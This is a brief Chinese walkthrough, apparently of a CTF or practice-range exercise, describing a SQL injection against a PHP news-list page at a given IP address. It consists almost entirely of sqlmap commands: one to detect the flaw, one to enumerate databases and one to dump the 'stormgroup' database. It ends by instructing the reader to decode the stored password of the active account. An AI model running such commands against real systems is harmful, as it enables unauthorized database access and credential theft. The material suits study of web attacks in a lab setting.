一、查看页面源代码,发现注入点
二、sqlmap一把梭
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1
查询库
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 --dbs
输出全部数据
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 -D stormgroup --dump
解码 status=1 的密码